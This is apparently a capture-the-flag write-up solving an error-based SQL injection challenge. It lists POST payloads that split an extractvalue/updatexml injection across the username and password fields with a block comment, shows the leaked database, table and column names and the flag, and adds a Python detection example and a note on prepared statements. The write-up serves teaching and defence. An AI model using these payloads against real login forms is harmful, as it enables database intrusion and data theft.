Error-Based SQL Injection with a Twist
Address: http://ctf5.shiyanbar.com/web/baocuo/index.php
References: https://www.jianshu.com/p/95f18a32ec7b https://blog.****.net/he_and/article/details/80572740
Useful information in the page source:
username and password must be submitted via POST, so use Burp.
Dump the current database: username=' or extractvalue /*&password=*/(1, concat(0x5c,(select database()))) or '
XPATH syntax error: '\error_based_hpf'
Dump the database: username=' or updatexml/*&password=1*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x7e),1) or '
XPATH syntax error: 'ffll44jj,users' [the error_based_hpf database contains two tables: ffll44jj and users]
Dump the table: username=' or updatexml/*&password=1*/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema regexp database() and table_name regexp 0x66666c6c34346a6a),0x7e),1) or '
XPATH syntax error: 'value' [the column in table ffll44jj; the table name is given in hexadecimal]
Dump the column: username=' or updatexml/*&password=1*/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or '
XPATH syntax error: 'flag{err0r_b4sed_sqli_+_hpf}'
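
Why a filter that looks at each POST field separately misses these requests, as an added example (not part of the original write-up or of the challenge's code). It assumes the server concatenates username and password, in that order, into one query string; TEMPLATE and the function names are hypothetical.

```python
import re

# Assumed query shape (not shown on the page): both POST fields are
# concatenated into one statement, username first.
TEMPLATE = "SELECT * FROM users WHERE username='{u}' AND password='{p}'"

XPATH_ERROR_CALL = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def per_field_hit(value):
    """Naive check: an XPATH-error function call inside a single field."""
    return bool(XPATH_ERROR_CALL.search(value))


def dangling_comment(value):
    """True if a field opens a /* it never closes, or closes one it never opened."""
    rest = BLOCK_COMMENT.sub("", value)
    return "/*" in rest or "*/" in rest


def assembled_sql(username, password):
    """The statement as the SQL parser sees it: fields joined, comments removed."""
    return BLOCK_COMMENT.sub("", TEMPLATE.format(u=username, p=password))


def inspect(username, password):
    sql = assembled_sql(username, password)
    return {
        "per_field": per_field_hit(username) or per_field_hit(password),
        "fragmented": dangling_comment(username) and dangling_comment(password),
        "assembled": bool(XPATH_ERROR_CALL.search(sql)),
    }


# Constructed samples: the first request from the write-up and a benign login.
SAMPLES = [
    ("' or extractvalue /*", "*/(1, concat(0x5c,(select database()))) or '"),
    ("alice", "correct horse /* not sql */"),
]

if __name__ == "__main__":
    for u, p in SAMPLES:
        print(inspect(u, p))
```

Inspecting the assembled statement is only a detection aid. Binding both fields as parameters of a prepared statement removes the injection point, because a comment opened in one value can no longer swallow the SQL between the two values.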